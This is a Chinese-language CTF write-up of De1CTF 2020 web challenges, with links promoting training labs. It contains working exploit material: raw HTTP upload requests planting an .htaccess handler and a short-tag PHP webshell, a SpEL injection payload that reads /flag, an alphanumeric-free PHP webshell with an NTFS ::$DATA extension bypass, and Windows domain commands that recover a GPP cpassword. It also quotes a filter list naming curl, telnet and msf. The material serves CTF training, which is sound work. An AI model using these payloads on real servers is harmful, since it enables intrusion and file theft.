题目质量很好,虽然很难可是学到很多东西!php
.php
后缀的文件先式式,不出意料失败,那么咱们就上传一张.jpg
的图片试试,结果以下:perl|pyth|ph|auto|curl|base|>|rm|ruby|openssl|war|lua|msf|xter|telnet in contents!
perl|pyth|ph|auto|curl|base|>|rm|ruby|openssl|war|lua|msf|xter|telnet
.htaccess
,添加其余后缀名解析为.php
文件。如:AddType application/x-httpd-php shell.ppt
。不过因为php
字符串的过滤咱们上传的文件不能包含php
,所以咱们上传的.httacess
文件中的php
能够用换行符绕过,对于上传了的shell.ppt
文件,若是该php开启了短标签咱们能够用短标签<?=
来代替<?php
,下面咱们就来尝试一下:POST /index.php HTTP/1.1 Host: 129.204.21.115 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------279095805311502314111982965121 Content-Length: 384 Origin: http://129.204.21.115 Connection: close Referer: http://129.204.21.115/index.php Upgrade-Insecure-Requests: 1 -----------------------------279095805311502314111982965121 Content-Disposition: form-data; name="fileUpload"; filename=".htaccess" Content-Type: image/jpeg AddType application/x-httpd-p\ hp .ppt -----------------------------279095805311502314111982965121 Content-Disposition: form-data; name="upload" submit -----------------------------279095805311502314111982965121--
HTTP/1.1 200 OK Date: Mon, 04 May 2020 08:45:52 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Content-Length: 1027 Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>Cheek in</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="stylesheet" type="text/css" href="style/css/style1.css"> <link rel="stylesheet" type="text/css" href="style/css/style2.css"> </head> <body> <div class="wrap"> <div class="container"> <h1 style="color: white; margin: 0; text-align: center">UPLOADS</h1> <form action="index.php" method="post" enctype="multipart/form-data"> <input class="wd" type="file" name="fileUpload" id="file"><br> <input class="wd" type="submit" name="upload" value="submit"> <p class="change_link" style="text-align: center"> <strong></strong> </br> <strong>Your files :.htaccess<br></strong> </br> <strong>Your dir : uploads/001149b089f853aad2bda9214b94fb21 <br></strong> </p> </form> </div> </div> </body> </html>
shell.ppt
:POST /index.php HTTP/1.1 Host: 129.204.21.115 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------279095805311502314111982965121 Content-Length: 376 Origin: http://129.204.21.115 Connection: close Referer: http://129.204.21.115/index.php Upgrade-Insecure-Requests: 1 -----------------------------279095805311502314111982965121 Content-Disposition: form-data; name="fileUpload"; filename="shell.ppt" Content-Type: image/jpeg GIF89a <?=system('cat /flag'); -----------------------------279095805311502314111982965121 Content-Disposition: form-data; name="upload" submit -----------------------------279095805311502314111982965121--
HTTP/1.1 200 OK Date: Mon, 04 May 2020 08:46:10 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Content-Length: 1027 Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>Cheek in</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="stylesheet" type="text/css" href="style/css/style1.css"> <link rel="stylesheet" type="text/css" href="style/css/style2.css"> </head> <body> <div class="wrap"> <div class="container"> <h1 style="color: white; margin: 0; text-align: center">UPLOADS</h1> <form action="index.php" method="post" enctype="multipart/form-data"> <input class="wd" type="file" name="fileUpload" id="file"><br> <input class="wd" type="submit" name="upload" value="submit"> <p class="change_link" style="text-align: center"> <strong></strong> </br> <strong>Your files :shell.ppt<br></strong> </br> <strong>Your dir : uploads/001149b089f853aad2bda9214b94fb21 <br></strong> </p> </form> </div> </div> </body> </html>
http://129.204.21.115/uploads/001149b089f853aad2bda9214b94fb21/shell.ppt
De1ctf{cG1_cG1_cg1_857_857_cgll111ll11lll}
绕过黑名单检查实现文件上传1http://hetianlab.com/expc.do?ec=ECIDc089-d935-4f8d-b0bd-d2342ea4423f(经过本实验了解文件上传漏洞产生的缘由,掌握绕过黑名单实现文件上传的利用方法)
spring boot
框架的web项目。GET /spel/calc?calc=%7b%7b7*7%7d%7d
[[49]]
,所以存在注入。经过测试发现,过滤了Runtime,java.lang,getClass,T(,new
等,new
咱们能够用neW
来代替,可是因为过滤了前面的字符咱们不可以进行rce了可是咱们能够用其余的方式读取文件。java.util.Scanner
来读取文件。payload以下:neW Scanner(neW java.io.FileInputStream(neW java.io.File("/flag"))).nextLine()
Springboot未受权访问 http://hetianlab.com/expc.do?ec=ECID07d9-3ccd-4c90-8a09-b980d8cd7858(经过该实验了解漏洞产生的缘由,掌握基本的漏洞利用及使用方法)
<?php //Clear the uploads directory every hour highlight_file(__FILE__); $sandbox = "uploads/". md5("De1CTF2020".$_SERVER['REMOTE_ADDR']); @mkdir($sandbox); @chdir($sandbox); if($_POST["submit"]){ if (($_FILES["file"]["size"] < 2048) && Check()){ if ($_FILES["file"]["error"] > 0){ die($_FILES["file"]["error"]); } else{ $filename=md5($_SERVER['REMOTE_ADDR'])."_".$_FILES["file"]["name"]; move_uploaded_file($_FILES["file"]["tmp_name"], $filename); echo "save in:" . $sandbox."/" . $filename; } } else{ echo "Not Allow!"; } } function Check(){ $BlackExts = array("php"); $ext = explode(".", $_FILES["file"]["name"]); $exts = trim(end($ext)); $file_content = file_get_contents($_FILES["file"]["tmp_name"]); if(!preg_match('/[a-z0-9;~^`&|]/is',$file_content) && !in_array($exts, $BlackExts) && !preg_match('/\.\./',$_FILES["file"]["name"])) { return true; } return false; } ?> <html> <head> <meta charset="utf-8"> <title>upload</title> </head> <body> <form action="index.php" method="post" enctype="multipart/form-data"> <input type="file" name="file" id="file"><br> <input type="submit" name="submit" value="submit"> </form> </body> </html>
Check()
函数的过滤,咱们不能使用普通的字符,而且不能上传后缀为.php
的文件,不过因为服务器是windows
所以咱们能够经过NTFS流的方式绕事后缀名的限制::$DATA
,例以下面的文件名:test.php::$DATA
<?=$_=[]?> <?=$_=@"$_"?> <?= $_=$_['!'=='@']?> <?=$__=$_?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$___=$__?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$___.=$__?> <?=$__=$_?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$___.=$__?> <?=$__++?> <?=$___.=$__?> <?=$__=$_?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$___.=$__?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$___.=$__?> <?=$____='_'?> <?=$__=$_?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$____.=$__?> <?=$__=$_?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$____.=$__?> <?=$__=$_?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?= $____.=$__?> <?=$__=$_?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$____.=$__?> <?=$_=$$____?> <?=$___($_[_])?>
a
。flag1_and_flag2hint
压缩包里,可是咱们没有密码,并且爆破是不成功的,所以咱们考虑windows渗透:net time /domain
,结果以下:dc.De1CTF2020.lab
。ipconfig
命令来查看域控:192.168.0.12
。net use \\192.168.0.12 net view \\192.168.0.12 net use S:\\192.168.0.12\wq 回车后便可映射局域网内目标机器的S盘。 或者直接访问net use \\192.168.0.12\SYSVOL\de1ctf2020.lab\Policies也行随你高兴
<?xml version="1.0" encoding="utf-8"?> <Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="HintZip_Pass" image="2" changed="2020-04-15 14:43:23" uid="{D33537C1-0BDB-44B7-8628-A6030A298430}"><Properties action="U" newName="" fullName="" description="" cpassword="uYgjj9DCKSxqUp7gZfYzo0F6hOyiYh4VmYBXRAUp+08" changeLogon="1" noChange="0" neverExpires="0" acctDisabled="0" userName="HintZip_Pass"/></User> </Groups>
gpp-decrypt
解密,结果以下:渗透测试训练营css
戳“阅读原文”一块儿来充电吧!html